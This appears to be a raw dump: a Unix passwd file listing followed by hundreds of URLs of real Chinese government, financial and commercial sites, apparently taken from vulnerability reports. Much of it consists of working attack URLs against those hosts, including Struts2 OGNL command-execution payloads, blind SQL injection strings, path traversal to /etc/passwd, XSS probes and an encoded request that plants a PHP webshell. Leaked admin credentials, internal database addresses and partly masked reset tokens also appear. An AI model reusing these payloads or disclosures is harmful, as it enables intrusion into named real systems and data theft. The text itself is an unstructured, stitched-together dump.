nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ident:x:98:98::/home/ident:/sbin/nologin netdump:x:34:34:Network user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin canna:x:39:39:Canna User:/var/lib/canna:/sbin/nologin htt:x:100:101:IIIMF Htt:/usr/lib64/im:/sbin/nologin radiusd:x:95:95:radiusd user:/:/bin/false ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false named:x:25:25:Named:/var/named:/sbin/nologin cyrus:x:76:12:Cyrus Server:/var/lib/imap:/bin/bash quagga:x:92:92:Quagga suite:/var/run/quagga:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash hacluster:x:511:90::/home/hacluster:/bin/bash dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash radvd:x:75:75:radvd user:/:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mailman:x:41:41:GNU Manager:/usr/lib/mailman:/sbin/nologin weblogic:x:512:512::/home/weblogic:/bin/bash bjpost:x:500:0::/home/bjpost:/bin/bash lifvc:x:513:513::/home/lifvc:/bin/bash zhainan:x:0:0::/home/zhainan:/bin/bash IP:10.0.183.1这个用猜有点难,如果不在这里设置,直接访问http://fjtct.now.cn:7751/10.0.183.1/是会跳转到内网http://10.0.183.1地址的,肯定访问不了。 http://hwap.xjwxcs.com/index.action http://hui.xjwxcs.com/coupon/couponDetail.action http://hui.xjwxcs.com/guige.jsp http://hwap.xjwxcs.com/guige.jsp http://sso.mamabb.com/register/commonRegisterNew.action http://cart.mamabb.com/shop/greenWay/goGreenWay.action http://www.ccard.net.cn/ccard/sortproduct/sortCard!soryCategory.action http://114.80.121.75/index.do http://www.ah.95598.cn/index.action?orgCd=3&&dsfwl=1 http://cdm.frkwj.com/LoginPage.aspx http://125.68.187.14/LoginPage.aspx http://222.177.25.186/LoginPage.aspx http://222.141.119.20/LoginPage.aspx http://114.135.72.197/ http://www.wccg.gov.cn/webback/Login.action http://aqbzh.chinasafety.gov.cn/sps/loginaction!login.action http://wap.114so.cn/search.action http://vipclub.letv.com/dispatcher.action?code=APPLYT1 http://vipclub.letv.com/dispatcher.action?code=APPLYT1 http://vipclub.letv.com/dispatcher.action?code=APPLYT1/../../web.xml http://wsfw.bjepb.gov.cn:8080/motor/login.action http://love.17173.com/admin_manage/ http://icp.now.cn/存在列目录漏洞导致数据库备份信息泄露 http://icp.now.cn/WEB-INF/ http://icp.now.cn/data/ http://icp.now.cn/backup/ www.hca.gov.cn,存在严重的struts2 http://www.scsf.gov.cn/tzxx/index.action http://115.182.94.145 http://115.182.94.145/resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml http://115.182.94.145/resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp www.cnhww.com http://localhost/viewreturn.asp http://localhost/viewreturn.asp http://wo.wasu.cn/viewBroadCastList.action http://www.962518.com/onlinetrain/foreground/beginStudyAction.action http://zshopbao.make-hb-171103.300.cn/manager/pages/login/login.jsp http://www.xd.com/security/forget_pass http://cpi.11185.cn/index.action http://cpi.11185.cn/guige.jsp http://www.58dongman.com/index.action http://fc.chachaba.com http://jzxy.ncut.edu.cn/old/chs/note.php?Jzxy_GongGao_ID=21 http://xxxxx/index!OAIndex.action http://xxxxx/index!OAIndex.action?redirect:$ http://www.jmi.tsinghua.edu.cn/jmi/do.php?index=Tsinghua&do=content&lang=zh&titleid=200 http://itv2.youku.com/onlyf.php?vid=XMzMyNDA3NzMy http://itv2.youku.com/onlyf.php?vid=XMzMyNDA3NzMy http://itv2.youku.com/onlyf.php?vid=XMzMyNDA3NzMy'%20or%20'1'='1 http://itv2.youku.com/onlyf.php?vid=XMzMyNDA3NzMy'%20and%20'1'='2 http://fencheng.tudou.com/login.action http://www.nestlebaby.com.cn/expert/question.action http://www.nestlebaby.com.cn/guige.jsp http://wdcx.yundasys.com:81/jjjk/jjjk.php http://wdcx.yundasys.com:81/car_query/ http://wdcx.yundasys.com:11347/p3_system_web/manage/power/sysuser_login.action http://role.wanmei.com/WEB-INF/web.xml http://role.wanmei.com/WEB-INF/conf/activemq.xml jdbc:mysql://192.168.127.26:3306/wmeovg?useUnicode=true&characterEncoding=UTF8"/ http://car.yundasys.com:81/df2009/php/mainFrame.php http://car.yundasys.com:81/df2009/php/wdmdtzbb_new.php http://bi.yundasys.com:10152/settlement/upload/upload_uploadExcel.action http://www.youngpeak.com.cn/ http://policy.mofcom.gov.cn/export/honey/c4-2-1.action http://www.lashou.com/account/reset?code= http://app.mps.gov.cn:8686/clueAction_clueStatement.action http://www.channelsoft.com/casedetail.jsp?type=0&contentid=83 http://www.lashou.com/account/reset?code= http://www.lashou.com/account/reset?code=MTg2MDA5M*******我是马赛克*******NTc5MkB*********jQxOXwzNDQwMDI3NTZkOTY4**********hMA%3D%3D http://minisite2.youku.com/activities_fee/www/design_tools/index.php http://minisite2.youku.com/activities_fee/www/design_tools/index.php?m=Design&a=designNew&id=996&view=yes http://minisite2.youku.com/activities_fee/www/design_tools/index.php?m=Design&a=designNew&view=yes&id=996 http://minisite2.youku.com/activities_fee/www/design_tools/index.php?m=Design&a=designNew&view=yes&id=996 http://www.gpai.net/index_index.action http://122.227.170.139/mLoginAction.do http://122.227.170.139//FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector http://117.21.241.238/frameset/login.action http://117.21.241.238/frameset/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://117.21.241.238/udb/toLoginAction.do http://117.21.241.238/myname/index1.jsp http://wap.doov.com.cn/page/indexList.do http://yypt.cib.com.cn/finhome/fin_product/index.action lp:/bin/false invscout:/usr/bin/ksh user:/usr/sbin/snapp:/usr/sbin/snappd ipsec:/usr/bin/ksh user:/var/spool/uucppublic:/usr/sbin/uucp/uucico pconsole:/usr/bin/ksh esa:/usr/bin/ksh empty:/usr/bin/ksh xtjk:/usr/bin/ksh weblogic:/usr/bin/ksh apache2063:/usr/bin/ksh cxwh:/usr/bin/ksh http://buy.hiapk.com/ http://events.youku.com/zuqiubaobei/index.php?realname=李燕 http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,1,1%29%29=115,1,0%29%29=1%20and%20%271%27=%271 http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,2,1%29%29=108,1,0%29%29=1%20and%20%271%27=%271 http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,3,1%29%29=97,1,0%29%29=1%20and%20%271%27=%271 http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,4,1%29%29=118,1,0%29%29=1%20and%20%271%27=%271 http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,5,1%29%29=101,1,0%29%29=1%20and%20%271%27=%271 http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,6,1%29%29=95,1,0%29%29=1%20and%20%271%27=%271 http://pc.buy.91.com http://job.njcb.com.cn:8080/sadvertise.action http://open.12114.org.cn/user/doPreCase.do http://210.51.167.163:8080/auth/step1.action http://210.51.167.163:8080/auth/step1.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.kdsw.cn/Bulletin/BulletinSearch.aspx?key=%27 http://125.69.112.239/login.jsp http://125.69.112.239/invoker/JMXInvokerServlet http://www.hsc.fr/ressources/outils/jisandwis/download下载 http://www.piccnet.com.cn/ http://scm.piccnet.com.cn/piccweb/netBiddingNoticeAction.action http://scm.piccnet.com.cn/piccweb/getPurchaseNoticeAction.action http://scm.piccnet.com.cn/piccweb/productMlTitle.action等等等等 http://scm.piccnet.com.cn/piccweb/M4.txt http://www.gsjs.gov.cn/yqsb/uploadfile.asp http://xgb.pku.edu.cn/home/viewPage.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://p.shvns.com/vnslogin/login.do http://wlkt.yn.gov.cn/onlinelearn/init.action http://mojie.xunlei.com/.bash_history http://se.sjtu.edu.cn/index.action http://sec.huawei.com/sec/web/mapp.do http://go.hn.189.cn/tbIndexAdvertisement!gotoIndex.action http://123.103.23.10/lxjweb/service/activeUser.do http://222.221.6.231/ders_resource/manager/login.jsp http.oa.broad-asia.net/thank.asp http://llt.fantong.com/login.action http://yunda.yonyou.com http://yunda.yonyou.com/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ http://www.pbx010.com/login_view.action http://www.51ey.com/loginAction!login.action http://research.gtja.net:8081/logon.action http://gpsone.gxbnet.cn/login.do http://hc15.aipai.com/user/347/18715347/4027355/card/14877943/14877943_big.jpg http://hc15.aipai.com/user/347/18715347/4027355/card/14877943/card.mp4?l=l http://www.189see.com/inclued/indexEmbedAction!findAllMallNotice.do http://im.wo.com.cn/webportal//loginSp/userLogin.action这里可以执行 http://im.wo.com.cn/webportal//loginSp/userLogin.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://lol.52pk.com/cache/20130720/111.html http://www.baidu00.com/pppa.js www.ncinfo.gov.cn http://www.ncinfo.gov.cn/Newsite/list.asp?btype=%D5%FE%B2%DF%B7%A8%B9%E6 http://www.ncinfo.gov.cn/Newsite/content_detail.asp?id=16856 http://www.ncinfo.gov.cn/Newsite/sub1.asp?id=224 http://scebm.bda.edu.cn/Qtbm!toList.action http://www.csndmc.ac.cn/newweb/secondpage.jsp?id=1208 http://bbs.5see.com http://bbs.5see.com/comiis_x19lou/comiis_logo.gif/.php http://bbs.5see.com/data/attachment/forum/201307/22/125630jaaj4bb6ifhjdbb1.jpg/ http://localhost/sdcms/user/email.asp?act=checkdb http://www.west263.com/services/webhosting/buy.asp http://www20.west263.com/services/webhosting/buy.asp http://cdn.west263.com/services/webhosting/buybj.asp http://www.west263.com/manager/domain/nsmodi.asp http://beian.bizcn.com/login_login.action http://beian.71.com/login_login.action http://www.100icp.com:18080/beian/login_login.action http://ispapi.dns-china.com:18080/beian/login_login.action http://222.80.184.140:8080/beian/login_login.action http://beian1.8849x.cn/beian/login_login.action http://jinan.icp.chinanetcenter.com/login_login.action http://beian.guilinlife.com:8080/beian/login_login.action http://www.xmcnc.net:8989/beian/login_login.action http://218.83.161.121/beian/login_login.action http://beian.loongo.com/login_login.action http://ba.21nic.cn:18080/login_login.action http://www.unnets.com:18080/beian/login_login.action http://218.246.195.60/beian/login_login.action http://125.39.152.21/login_login.action http://61.152.93.115:5151/beian/login_login.action http://beian.icelit.com/login_login.action http://beian.cnc.71.com/login_login.action http://www.auchan.com.cn:8089/AuchanWeb/Card!ClientProcess.action http://www.bmrzzx.com.cn/basedemo/index.action http://sales.sc.chinaunicom.com/echannel/Login!input.action http://www.t3pay.cn/contentAction!getSingleContentBySyGg.action http://www.t3pay.cn/login.jsp https://www.edrbank.com/pbank/common/account/netbanksign.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://jeepont.com/shortshow.asp?id=2751and1 http://beijing.koofang.com/weituo/ http://trop.agridata.cn/ch_NewsFrm/newsOne.asp?id=401 site:youku.com inurl:callback http://m.nuomi.com/user/address/save?areaId=1000010000 http://xss.tw/2644 http://www.spqi.gov.cn/trav/StoryFile.aspx?RecordID=2201 http://www.spqi.gov.cn/trav/StoryFile.aspx?RecordID=2201 http://wap.citygf.com/wap/index.do http://wap.citygf.com/wap/guige.jsp http://wap.citygf.com/wap/404.jsp http://sxdkj.gov.cn:2012/ http://sxdkj.gov.cn:2012/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 http://sxdkj.gov.cn:2012/plus/mytag_js.php?aid=9013 http://www.xxx.org/plus/90sec.php http://ky.ahedu.gov.cn/show.asp?id=353 http://www.cssti.cn/zxzxinfo.asp?id=438 http://218.77.*.*:8001/LoginExtMenuAction.action http://ytw.yzzb.com.cn/item/listphoto.asp?id=70 http://www.wjcti.com/sg_read.asp?id=3199 http://zwgk.heihe.gov.cn/zf_neirong.asp?ID=158234392409 http://220.181.61.111/index http://www.tgw.cn:18080/Index.action http://lib.nuc.edu.cn/new/index.action http://zz.edu.cn/project/pxxm_lb.php?act=showTypeList&typeid=3 http://www.pd-sts.com/sts/stsIndex/testList.action http://www.deppon.com.cn/transonline/orderBrowse.action http://www.tbook.com.cn/IndexAction.action http://www.casm.ac.cn/news.php?col=93&file=3821 http://www.moko.cc/subscribeUpdate|faceAddSubscribe.action http://mall.wxcd.net.cn/activity/lovehome/portal/index!index.action http://www.ecdc.net.cn/conference/sstf/en/mediareg.asp http://pay.5see.com/getgameServers.aspx?game= http://pay.5see.com/getgameServers.aspx?game=aaa http://pay.5see.com/getgameServers.aspx?game=aaa http://pay.5see.com/getgameServers.aspx?game=aaa'%20and%20'1'='1 http://pay.5see.com/getgameServers.aspx?game=aaa http://218.206.165.70:8080/customdev-qhwxcs/xn/hospital/chaxun.action http://www.b2b-builder.com/announcement.php?id=30 http://www.jsyzpx.com/2012ds/ http://221.224.25.28:8008/framework/news/NewsEdit.aspx http://aigu.stcn.com/try.action http://aigu.stcn.com/guige.jsp http://www.icinfo.cn/ http://www.icinfo.cn/manageuser/manageLogin.action?username=admin&password=huixinadmin http://221.180.20.100/index/index.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.nari-china.com/htgl/ http://www.nari-china.com/htgl/top.aspx http://www.nari-china.com/htgl/left.aspx http://www.nari-china.com/htgl/Default.aspx http://www.nari-china.com/htgl/left.aspx http://211.150.64.86/PCC/loginMail.do http://211.150.64.87/PCC/loginMail.do http://211.150.64.88/PCC/loginMail.do http://search.dichan.com/search.dichan.com.rar http://zzxxw.dahe.cn/index.do http://zzxxw.dahe.cn/guige.jsp http://www.ccjgdj.gov.cn/index.action http://dmp.kingdee.com/bak/sql.rar http://cm.cb.com.cn/cube/blog/goCenter.action http://cm.cb.com.cn/cube/guige.jsp http://ieread.cb.com.cn/register.do http://ieread.cb.com.cn/guige.jsp http://222.247.54.156/ http://117.79.80.12/gfan-recharge!rechargeGameDis.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.szjsj.gov.cn/ZhuJian/NewAction_safe.action http://sswz.spb.gov.cn/ http://sswz.spb.gov.cn/login/login!link.action http://hve.sgepri.sgcc.com.cn/vhe/ch/reader/key_query.aspx Url:http://pay.7wgame.com/getgameServers.aspx?game=1 http://www.ynrcfw.cn/ynrcfw/index_rsdl.action http://jss.usst.edu.cn/ch/reader/key_query.aspx http://gswxb.cnjournals.cn/ch/reader/key_query.aspx http://www.dzykt.com/dzyktcn/ch/reader/key_query.aspx http://www.kcdz.ac.cn/ch/reader/key_query.aspx http://tnuaa.nuaa.edu.cn/ch/reader/key_query.aspx http://www.jos.org.cn/ch/reader/key_query.aspx http://www.jors.cn/jrs/ch/reader/key_query.aspx http://www.cjcmm.com.cn/cjcmmte/ch/reader/key_query.aspx http://magazine.laser-infrared.com/ch/reader/key_query.aspx http://www.zgykdxxb.cn/jcpu/ch/reader/key_query.aspx?volume=31&issue=1&start_page=25 http://www.gdforestscience.com/ch/reader/key_query.aspx http://events.youku.com/crowneplaza/dreams.php?target=1 http://event.youku.com/tsingtaobeer/search.php?swd=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit.x=0&submit.y=0 http://ilovenet.youku.com/list.php?page=1%2b%3Cscript%3Ealert%281%29;%3C/script%3E http://zj.118114.cn:8080/default/joblist?district=330000&keyword=1 http://www.ahosta.gov.cn:83/OSTA/indexG.action http://piao.fj.118114.cn/piao/dy/movie.action?region_code=350100 http://www.wuhan.gov.cn/frontpage/search/SearchGroup.action http://xuekao.gotedu.com/)、天天向上教务管理系统(http://www.gotedu.com/school/ http://zyjd.post.gov.cn/scorequery/beforequery.jsp http://www.chinapost.gov.cn/folder2381/index.html http://zyjd.post.gov.cn/scorequery/beforequery.jsp http://115.236.99.186/ROOT/nnl/auth.action http://hy.shenzhenpost.com.cn/shop/member!passwordRecover.action http://wap.i139.cn/dsmmp/showList.action http://xxcx.cwun.org/adminx.php http://www.022wo.com/VasRecommendList.action http://sn.vvmall.cn/index.action http://kj.xjcz.gov.cn/web/initAddWebSign.action http://search.17k.com/query.do http://api.tuan800.com/oauth/oauth/authorize?oauth_token=91ee14dfe2174d4286a2f8889d85f29d&oauth_callback=http%3A%2F%2Foauth.qunar.com%2Foauth-client%2Ftuan800%2Flogin%3Foauth_secret%3D27e05124d45b2131e3e5e20181f260ac http://api.tuan800.com/oauth/oauth/authorize?oauth_token=efeda64521c2576a827769384c045cd0&oauth_callback=http://wooyun.org http://17186.cn/ajax/account/isMobile_Liantong.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.bzldbz.gov.cn/index.action http://www.junlebao.com/regok.aspx?hid=**** http://www.junlebao.com/regok.aspx?hid=1016 http://www.junlebao.com/regok.aspx?hid=977 http://yun.enkj.com/fckeditor/editor/fckeditor.html http://www.dingxindai.com/?user&q=getpwd http://www.heda.gov.cn/index.action http://merchant.bestpay.com.cn/writeImg.action http://account.oppo.com/sysadmin.tar.gz http://user.migu.cn/login/index.action http://idea.91.com/ http://idea.91.com/Detail.aspx?subjectID=693#showcase http://110.249.253.166:82/gxtxm/regUser.action http://www.rcccpku.org/public/homepage/home.action http://tv.so.youku.com/index/.svn/entries http://t.stat.youku.com/.svn/entries http://111.12.149.56/wireCity/admin/admin!main.action http://111.12.149.56/wireCity/shop/shop!index.action http://pay.duowan.com/userChooseMethodAction.action http://fw.zjfda.gov.cn/sp/xkgs!list.do http://222.91.161.254:8020/login/navigation.action http://www.baison.com.cn:8012/admin.php http://big5.mofcom.gov.cn/gate/big5/url/ http://big5.mofcom.gov.cn/gate/big5/www.wooyun.org/ http://218.206.93.51:8081/manager/login.do http://baidusz.ti-net.cn/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media http://wooyun.org/bugs/wooyun-2013-027265 http://wooyun.org/bugs/wooyun-2013-031613 www.kugou.com\/newuc\/user\/resetpwd\/code=BFF40******B9029876E7FE42382110175C318F04C27*********371330DBB4367D9B3EA3********AE5835C2A275F2FE52989BDB434E74*********CDFA43DB7F91B5E9CE117BCEBCED9A7FA53F123FAE5C0F7508522E27C53BA5ABDE9****EA5FD http://www.kugou.com/newuc/user/resetpwd/code=BFF40******B9029876E7FE42382110175C318F04C27*********371330DBB4367D9B3EA3********AE5835C2A275F2FE52989BDB434E74*********CDFA43DB7F91B5E9CE117BCEBCED9A7FA53F123FAE5C0F7508522E27C53BA5ABDE9****EA5FD http://pentax.com.cn/download.html?file=./ http://pentax.com.cn/download.html?file=./../../../../../../etc/passwd shell:http://agent.keepc.com/agent/dy1.jsp http://agent.keepc.com/agent/amp/login.action jdbc:mysql://127.0.0.1/agent?useUnicode=true&characterEncoding=UTF-8 jdbc:mysql://127.0.0.1/kc_feedback?useUnicode=true&characterEncoding=UTF-8 jdbc:mysql://127.0.0.1/kc_ad?useUnicode=true&characterEncoding=UTF-8 jdbc:mysql://127.0.0.1/kc_epay_new2?useUnicode=true&characterEncoding=GBK jdbc:mysql://58.83.134.59:9036/xxt?characterEncoding=UTF-8 POC:http://120.196.169.167:8080/sys/sys_login!login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://120.qdphb.gov.cn/index.action http://mmbox.vnet.cn/userconfig/login_relogin.action http://gzc.songjiang.gov.cn/systemManagementDir_gzc/login.aspx http://115.239.227.141:8080 http://115.239.227.141:8080/root/root.jsp http://c3.91.com/ http://icp.cernet.com/login.do http://tag.cernet.com/login.do site:weiphone.com inurl:php得到过如下信息。 tao.dev.weiphone.com/news/index/seeNews/42.html‎ site:dev.weiphone.com http://dz.dev.weiphone.com http://passport2.dev.weiphone.com http://passport.dev.weiphone.com http://passport.dev.weiphone.com/ucenter http://passport2.dev.weiphone.com/ucenter http://www.qdzfbz.gov.cn/announcementInfoWeb!detail.action http://mchina.cn/search.action http://public.baihe.com/login.action http://sohuweiqi.com/IndexMain.action http://video.liba.com/searchResult.php?f_id=1 http://video.liba.com/detail.php?f_id=3 http://video.liba.com/detail.php?id=477&f_id=1 http://marry.liba.com/info.php http://video.liba.com/phpinfo.php http://focus.liba.com/ http://www.qhydsc.com/shop/product!list.action?pager.pageNumber=2&pager.pageSize=10&pager.orderBy=createDate&pager.orderType=asc&id=ff808081393413a60139341624bb000d http://www.jdcw.sjtu.edu.cn/payment/pay/payment_selBank.action?billinfo.billno=XXXXXXX http://www.tianxiaxiyan.com http://www.tianxiaxiyan.com/index.php/feast/shop_list/money/%5C.html index.php/feast/search.html www.tianxiaxiyan.com http://www.tianxiaxiyan.com/index.php/feast/search.html http://202.101.162.229/zjmsaDeclare/indexAction.action https://pay.comsys.net.cn/login.action http://fhy.wh.sdu.edu.cn/list.action?classID=1 http://payeasy.net.cn/security/login.action https://www.dingxindai.com/index.php?home&user_id=324 https://www.dingxindai.com/u/25这样的格式是你们伪静态之后的,那既然是伪静态,就自己来中转一下了注射。 https://www.dingxindai.com/u/25这个吧。中转后的地址: http://127.0.0.1/zhongzhuan.php?id=25 http://219.141.228.206/login!login.action http://www.bjcz.gov.cn/ http://sms.100866.net:8089/login/login.action http://www.aydzjc.gov.cn/下有url为http://www.aydzjc.gov.cn/common/common_info.action?wid=201111281102051004 http://www.xzwater.gov.cn/hwzwgk/main/action/main!login.action http://nj.esf.focus.cn/deal/queryByJidu.do http://www.lxzq.com.cn/admin/login.do http://email.lxzq.com.cn/admin/login.do http://ht.lxzq.cn/admin/login.do http://flash.lxzq.com.cn/admin/login.do 